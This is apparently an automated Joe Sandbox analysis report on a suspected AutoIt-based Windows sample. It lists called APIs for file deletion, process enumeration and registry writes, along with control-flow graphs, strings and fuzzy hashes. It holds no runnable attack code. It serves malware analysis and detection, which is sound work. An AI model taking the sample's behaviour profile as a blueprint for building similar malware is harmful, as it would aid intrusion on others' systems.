                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                              • String ID: \*.*
                                                                                              • API String ID: 1946585618-1173974218
                                                                                              • Opcode ID: 9ab89dfdaa7605d700a14c0d8a2876c3c4d438448d8ee9f7fd012643383c0033
                                                                                              • Instruction ID: 08f7b241fa90914b5db871eeae3a4e1c88afa5c96840d1dcd1748f091c676aeb
                                                                                              • Opcode Fuzzy Hash: 9ab89dfdaa7605d700a14c0d8a2876c3c4d438448d8ee9f7fd012643383c0033
                                                                                              • Instruction Fuzzy Hash: 35615B3180124EAADF01EBE0DA96AFDBFB6BF54300F644065E541B71A2EB755F09CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0059557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00595558,?,?,005D4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0059559E
                                                                                                • Part of subcall function 005FE9C5: GetFileAttributesW.KERNELBASE(?,005FD755), ref: 005FE9C6
                                                                                              • FindFirstFileW.KERNELBASE(?,?), ref: 005FDBE0
                                                                                              • DeleteFileW.KERNELBASE(?,?,?,?), ref: 005FDC30
                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 005FDC41
                                                                                              • FindClose.KERNEL32(00000000), ref: 005FDC58
                                                                                              • FindClose.KERNEL32(00000000), ref: 005FDC61
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                              • String ID: \*.*
                                                                                              • API String ID: 2649000838-1173974218
                                                                                              • Opcode ID: 1f18b1518d12207d604004fddd296b55a877551352c8f557f966ff8bf165175a
                                                                                              • Instruction ID: 9dd195ff09f20c057de52adbcb02aead0fa0f1a8557d2b8f9ed268f6db73db14
                                                                                              • Opcode Fuzzy Hash: 1f18b1518d12207d604004fddd296b55a877551352c8f557f966ff8bf165175a
                                                                                              • Instruction Fuzzy Hash: 0331AF3100838A9BDB00EF64D9959AFBBF9BE91300F444D1DF5D5831A1EB64DE09CBA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 005FDCC1
                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 005FDCCF
                                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 005FDCEF
                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 005FDD9C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                                                                              • String ID:
                                                                                              • API String ID: 3243318325-0
                                                                                              • Opcode ID: afb86d97ec19734370ec097c2617666687f115c368babf7030795216065ca040
                                                                                              • Instruction ID: b2ae9e1ce7fb1f4f8c843c3e09efc721b9f7da6ff628291ccc79d7f9ab8f1f00
                                                                                              • Opcode Fuzzy Hash: afb86d97ec19734370ec097c2617666687f115c368babf7030795216065ca040
                                                                                              • Instruction Fuzzy Hash: C4316C711083059FE711EF60D889BAFBFF9BF99350F04082DF581861A1EB719945CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(?,005D4686), ref: 005FE397
                                                                                              • GetFileAttributesW.KERNELBASE(?), ref: 005FE3A6
                                                                                              • FindFirstFileW.KERNELBASE(?,?), ref: 005FE3B7
                                                                                              • FindClose.KERNELBASE(00000000), ref: 005FE3C3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 2695905019-0
                                                                                              • Opcode ID: 9f304abbbc7c6e7eff33bbd922ac2d1b23e8473d73dc560c63d084fbe6579701
                                                                                              • Instruction ID: 1095670156b02d9b602717cde35940dd5bb13999e60590ab1056fa9919bcf99f
                                                                                              • Opcode Fuzzy Hash: 9f304abbbc7c6e7eff33bbd922ac2d1b23e8473d73dc560c63d084fbe6579701
                                                                                              • Instruction Fuzzy Hash: 30F0A730411918978331673C9C0E47A7BADAE41335B105B11F635C21F0D774A9564595
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(?,?,005B504E,?,006598D8,0000000C,005B51A5,?,00000002,00000000), ref: 005B5099
                                                                                              • TerminateProcess.KERNEL32(00000000,?,005B504E,?,006598D8,0000000C,005B51A5,?,00000002,00000000), ref: 005B50A0
                                                                                              • ExitProcess.KERNEL32 ref: 005B50B2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                              • String ID:
                                                                                              • API String ID: 1703294689-0
                                                                                              • Opcode ID: 0ded76f057b7d01e4b586752f508b2cf40dfdc0ca6d038d88ba05b0ac7e52799
                                                                                              • Instruction ID: f217779858b3a41512763f974376d96427e5ec8619f2c865e68110401070fb7d
                                                                                              • Opcode Fuzzy Hash: 0ded76f057b7d01e4b586752f508b2cf40dfdc0ca6d038d88ba05b0ac7e52799
                                                                                              • Instruction Fuzzy Hash: C8E09231401A48AFCB25BF54DD0DF983F6ABB81391F005018F8098A522EB35EA52CA90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 0 61cd16-61cd5a call 59bf07 * 3 7 61cd65-61cdd8 call 598e70 call 61d6b1 call 61d2f7 0->7 8 61cd5c-61cd5f 0->8 22 61ce08-61ce0d 7->22 23 61cdda-61cde8 7->23 8->7 9 61ce64-61ce71 call 59e650 8->9 15 61d1ef-61d212 call 59bd2c * 3 9->15 25 61ce7c 22->25 26 61ce0f-61ce24 RegConnectRegistryW 22->26 27 61cdea 23->27 28 61cded-61cdfd 23->28 31 61ce80-61ceab RegCreateKeyExW 25->31 33 61ce76-61ce7a 26->33 34 61ce26-61ce43 call 597ab0 26->34 27->28 29 61ce02-61ce06 28->29 30 61cdff 28->30 35 61ce61-61ce63 29->35 30->29 36 61cead-61ceca call 597ab0 31->36 37 61cf0e-61cf13 31->37 33->31 45 61ce45 34->45 46 61ce48-61ce58 34->46 35->9 50 61cecc 36->50 51 61cecf-61cede 36->51 42 61d1d6-61d1e7 RegCloseKey 37->42 43 61cf19-61cf42 call 598e70 call 5b4db8 37->43 42->15 47 61d1e9-61d1ed RegCloseKey 42->47 59 61cf44-61cf91 call 598e70 call 5b4cf3 call 598e70 * 2 43->59 60 61cf96-61cfb9 call 598e70 call 5b4db8 43->60 45->46 52 61ce5a 46->52 53 61ce5d 46->53 47->15 50->51 55 61cee0 51->55 56 61cee3-61cef9 call 59e650 51->56 52->53 53->35 55->56 56->15 63 61ceff-61cf09 RegCloseKey 56->63 85 61d2bb-61d2c7 RegSetValueExW 59->85 71 61d047-61d06a call 598e70 call 5b4db8 60->71 72 61cfbf-61d019 call 598e70 call 5b4cf3 call 598e70 * 2 RegSetValueExW 60->72 63->15 86 61d070-61d0d6 call 598e70 call 5b019b call 598e70 call 59605e 71->86 87 61d156-61d179 call 598e70 call 5b4db8 71->87 72->42 105 61d01f-61d042 call 597ab0 call 59e650 72->105 85->42 89 61d2cd-61d2f2 call 597ab0 call 59e650 85->89 124 61d0f6-61d128 call 598e70 RegSetValueExW 86->124 125 61d0d8-61d0dd 86->125 106 61d215-61d238 call 598e70 call 5b4db8 87->106 107 61d17f-61d19f call 59c92d call 598e70 87->107 89->42 105->42 128 61d265-61d282 call 598e70 call 5b4db8 106->128 129 61d23a-61d260 call 59c5df call 598e70 106->129 127 61d1a1-61d1b4 RegSetValueExW 107->127 139 61d14a-61d151 call 5b01a4 124->139 140 61d12a-61d143 call 597ab0 call 59e650 124->140 130 61d0e5-61d0e8 125->130 131 61d0df-61d0e1 125->131 127->42 135 61d1b6-61d1c0 call 597ab0 127->135 145 61d1c5-61d1cf call 59e650 128->145 153 61d288-61d2b9 call 60276a call 598e70 call 6027da 128->153 129->127 130->125 132 61d0ea-61d0ec 130->132 131->130 132->124 137 61d0ee-61d0f2 132->137 135->145 137->124 139->42 140->139 145->42 153->85
                                                                                              APIs
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0061CE1C
                                                                                              • RegCreateKeyExW.KERNELBASE(?,?,00000000,0062DCD0,00000000,?,00000000,?,?), ref: 0061CEA3
                                                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0061CF03
                                                                                              • _wcslen.LIBCMT ref: 0061CF53
                                                                                              • _wcslen.LIBCMT ref: 0061CFCE
                                                                                              • RegSetValueExW.KERNELBASE(00000001,?,00000000,00000001,?,?), ref: 0061D011
                                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0061D120
                                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0061D1AC
                                                                                              • RegCloseKey.KERNELBASE(?), ref: 0061D1E0
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0061D1ED
                                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0061D2BF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                              • API String ID: 9721498-966354055
                                                                                              • Opcode ID: 1c44a26ee1bd012a23eadb2a5bcf72cab268c0526af1947ae867c7940fe2ee5f
                                                                                              • Instruction ID: 7682e4f69a40a2624c0e8fb3c70ec1bcc188ba16ccc108ffdf575f2566021d2f
                                                                                              • Opcode Fuzzy Hash: 1c44a26ee1bd012a23eadb2a5bcf72cab268c0526af1947ae867c7940fe2ee5f
                                                                                              • Instruction Fuzzy Hash: DF125B352046019FDB14DF14C895A6ABBE6FF89714F18845CF99A9B3A2CB31FD42CB81
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 163 593e15-593e45 call 5b019b call 5b016b 168 593e6e-593e80 call 5b919b 163->168 169 593e47-593e49 163->169 171 593e4a-593e50 168->171 176 593e82-593e94 call 5b919b 168->176 169->171 173 593e52-593e62 call 5b015d call 5b01a4 171->173 174 593e65-593e6b 171->174 173->174 182 593e9a-593eac call 5b919b 176->182 183 5d4585-5d4587 176->183 186 5d458c-5d458f 182->186 187 593eb2-593ec4 call 5b919b 182->187 183->171 186->171 190 593eca-593edc call 5b919b 187->190 191 5d4594-5d45cb call 594154 call 594093 call 593fb8 call 5b4cf3 187->191 196 5d462e-5d4633 190->196 197 593ee2-593ef4 call 5b919b 190->197 223 5d45cd-5d45d8 191->223 224 5d4608-5d460b 191->224 196->171 201 5d4639-5d4655 call 5ae2e5 196->201 206 593efa-593f0c call 5b919b 197->206 207 5d4677-5d4688 call 5fa316 197->207 209 5d4657-5d465b 201->209 210 5d4662-5d466a 201->210 219 593f0e-593f20 call 5b919b 206->219 220 593f26 206->220 221 5d46dc-5d46e2 207->221 222 5d468a-5d46d2 call 59b25f * 2 call 595379 call 593aa3 call 59bd2c * 2 207->222 209->201 214 5d465d 209->214 210->171 215 5d4670 210->215 214->171 215->207 219->171 219->220 231 593f29-593f2e call 59ad74 220->231 226 5d46f5-5d46ff call 5fa12a 221->226 242 5d4704-5d4706 222->242 268 5d46d4-5d46d7 222->268 223->224 225 5d45da-5d45e1 223->225 227 5d460d-5d461b 224->227 228 5d45f6-5d4603 call 5b01a4 224->228 225->228 232 5d45e3-5d45e7 225->232 226->242 241 5d4620-5d4629 call 5b01a4 227->241 228->226 238 593f33-593f35 231->238 232->228 239 5d45e9-5d45f4 232->239 244 593f3b-593f5e call 593fb8 call 594093 call 5b919b 238->244 245 5d46e4-5d46e9 238->245 239->241 241->171 242->171 264 593fb0-593fb3 244->264 265 593f60-593f72 call 5b919b 244->265 245->171 250 5d46ef-5d46f0 245->250 250->226 264->231 265->264 270 593f74-593f86 call 5b919b 265->270 268->171 273 593f88-593f9a call 5b919b 270->273 274 593f9c-593fa5 270->274 273->231 273->274 274->171 275 593fab 274->275 275->231
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                              • API String ID: 0-1645009161
                                                                                              • Opcode ID: 55172d4dd7d32ced6daab5237d32698fc6433a7d8c5d84a52ad96eabbd2cc5f2
                                                                                              • Instruction ID: 8c2c769692c598382e83a1a802123e980c0a5f1ffe88eff784b047f129b2ee25
                                                                                              • Opcode Fuzzy Hash: 55172d4dd7d32ced6daab5237d32698fc6433a7d8c5d84a52ad96eabbd2cc5f2
                                                                                              • Instruction Fuzzy Hash: C081F671A40217FBDF21AF68DC4AFAE3F69BF55700F044012F905AA182EB70EA41DB51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 440 593696-5936ab 441 59370b-59370d 440->441 442 5936ad-5936b0 440->442 441->442 443 59370f 441->443 444 593711 442->444 445 5936b2-5936b9 442->445 446 5936f6-5936fe DefWindowProcW 443->446 447 5d3dce-5d3df6 call 592f24 call 5af1c6 444->447 448 593717-59371c 444->448 449 59378b-593793 PostQuitMessage 445->449 450 5936bf-5936c4 445->450 452 593704-59370a 446->452 483 5d3dfb-5d3e02 447->483 454 59371e-593721 448->454 455 593743-59376a SetTimer RegisterWindowMessageW 448->455 453 59373f-593741 449->453 456 5936ca-5936ce 450->456 457 5d3e3b-5d3e4f call 5fc80c 450->457 453->452 463 5d3d6f-5d3d72 454->463 464 593727-59373a KillTimer call 59388e call 59572c 454->464 455->453 458 59376c-593777 CreatePopupMenu 455->458 459 593795-59379f call 5afcbb 456->459 460 5936d4-5936d9 456->460 457->453 475 5d3e55 457->475 458->453 477 5937a4 459->477 465 5936df-5936e4 460->465 466 5d3e20-5d3e27 460->466 470 5d3daa-5d3dc9 MoveWindow 463->470 471 5d3d74-5d3d78 463->471 464->453 473 593779-593789 call 5937a6 465->473 474 5936ea-5936f0 465->474 466->446 481 5d3e2d-5d3e36 call 5f1367 466->481 470->453 478 5d3d99-5d3da5 SetFocus 471->478 479 5d3d7a-5d3d7d 471->479 473->453 474->446 474->483 475->446 477->453 478->453 479->474 484 5d3d83-5d3d94 call 592f24 479->484 481->446 483->446 488 5d3e08-5d3e1b call 59388e call 5938f2 483->488 484->453 488->446
                                                                                              APIs
                                                                                              • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00593690,?,?), ref: 005936FE
                                                                                              • KillTimer.USER32(?,00000001,?,?,?,?,?,00593690,?,?), ref: 0059372A
                                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0059374D
                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00593690,?,?), ref: 00593758
                                                                                              • CreatePopupMenu.USER32 ref: 0059376C
                                                                                              • PostQuitMessage.USER32(00000000), ref: 0059378D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                              • String ID: 0$f$0$f$TaskbarCreated
                                                                                              • API String ID: 129472671-1944884100
                                                                                              • Opcode ID: 5eab08a1512ed1cb795e2b0f0e8627aafb7a8289738b0ba786dd87ed30b06773
                                                                                              • Instruction ID: 9b8c893e3f7660ebacec7c062d5b7994ba6d0d7490dfc7c4f5d87d84285752db
                                                                                              • Opcode Fuzzy Hash: 5eab08a1512ed1cb795e2b0f0e8627aafb7a8289738b0ba786dd87ed30b06773
                                                                                              • Instruction Fuzzy Hash: 8C4112B1104546FBDF242BA8DC6EB793F5BFB40390F041626F5129A3A1DBA99F018762
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 005935DE
                                                                                              • RegisterClassExW.USER32(00000030), ref: 00593608
                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00593619
                                                                                              • InitCommonControlsEx.COMCTL32(?), ref: 00593636
                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00593646
                                                                                              • LoadIconW.USER32(000000A9), ref: 0059365C
                                                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 0059366B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                              • API String ID: 2914291525-1005189915
                                                                                              • Opcode ID: 3ffc27c6f86c3a873b390959cf3246003f0228e01312b94fc2610032b886dd28
                                                                                              • Instruction ID: 8efae99349879cfdd3f7cbbbdba2163cbe05546907b8b72ee4f7b1b4854eb9d5
                                                                                              • Opcode Fuzzy Hash: 3ffc27c6f86c3a873b390959cf3246003f0228e01312b94fc2610032b886dd28
                                                                                              • Instruction Fuzzy Hash: 7A21E0B1D01719AFDB10DFA5E889ADDBBB6FB08700F10621AF611A62A0D7B54541CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 497 5d09fb-5d0a2b call 5d07cf 500 5d0a2d-5d0a38 call 5bf656 497->500 501 5d0a46-5d0a52 call 5c55b1 497->501 506 5d0a3a-5d0a41 call 5bf669 500->506 507 5d0a6b-5d0ab4 call 5d073a 501->507 508 5d0a54-5d0a69 call 5bf656 call 5bf669 501->508 518 5d0d1d-5d0d23 506->518 516 5d0ab6-5d0abf 507->516 517 5d0b21-5d0b2a GetFileType 507->517 508->506 520 5d0af6-5d0b1c GetLastError call 5bf633 516->520 521 5d0ac1-5d0ac5 516->521 522 5d0b2c-5d0b5d GetLastError call 5bf633 CloseHandle 517->522 523 5d0b73-5d0b76 517->523 520->506 521->520 527 5d0ac7-5d0af4 call 5d073a 521->527 522->506 534 5d0b63-5d0b6e call 5bf669 522->534 525 5d0b7f-5d0b85 523->525 526 5d0b78-5d0b7d 523->526 530 5d0b89-5d0bd7 call 5c54fa 525->530 531 5d0b87 525->531 526->530 527->517 527->520 540 5d0bd9-5d0be5 call 5d094b 530->540 541 5d0be7-5d0c0b call 5d04ed 530->541 531->530 534->506 540->541 548 5d0c0f-5d0c19 call 5c8a3e 540->548 546 5d0c0d 541->546 547 5d0c1e-5d0c61 541->547 546->548 550 5d0c63-5d0c67 547->550 551 5d0c82-5d0c90 547->551 548->518 550->551 553 5d0c69-5d0c7d 550->553 554 5d0d1b 551->554 555 5d0c96-5d0c9a 551->555 553->551 554->518 555->554 556 5d0c9c-5d0ccf CloseHandle call 5d073a 555->556 559 5d0cd1-5d0cfd GetLastError call 5bf633 call 5c56c3 556->559 560 5d0d03-5d0d17 556->560 559->560 560->554
                                                                                              APIs
                                                                                                • Part of subcall function 005D073A: CreateFileW.KERNELBASE(00000000,00000000,?,005D0AA4,?,?,00000000,?,005D0AA4,00000000,0000000C), ref: 005D0757
                                                                                              • GetLastError.KERNEL32 ref: 005D0B0F
                                                                                              • __dosmaperr.LIBCMT ref: 005D0B16
                                                                                              • GetFileType.KERNELBASE(00000000), ref: 005D0B22
                                                                                              • GetLastError.KERNEL32 ref: 005D0B2C
                                                                                              • __dosmaperr.LIBCMT ref: 005D0B35
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 005D0B55
                                                                                              • CloseHandle.KERNEL32(?), ref: 005D0C9F
                                                                                              • GetLastError.KERNEL32 ref: 005D0CD1
                                                                                              • __dosmaperr.LIBCMT ref: 005D0CD8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                              • String ID: H
                                                                                              • API String ID: 4237864984-2852464175
                                                                                              • Opcode ID: 5e9140804d4b81f7e7aeed574e0edd9360e816b317f162cfbd1537185bebc7e8
                                                                                              • Instruction ID: 86b0d3ec81d43216389f96276cf6b30c97ce65e8c05e97a52e5594a81d81454f
                                                                                              • Opcode Fuzzy Hash: 5e9140804d4b81f7e7aeed574e0edd9360e816b317f162cfbd1537185bebc7e8
                                                                                              • Instruction Fuzzy Hash: 66A11332A041459FDF29AFACD856BAE7FA1BB46324F14115BF8119F3E1C7309912CB52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 0059551B: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,005D4B50,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00595539
                                                                                                • Part of subcall function 005951BF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 005951E1
                                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0059534B
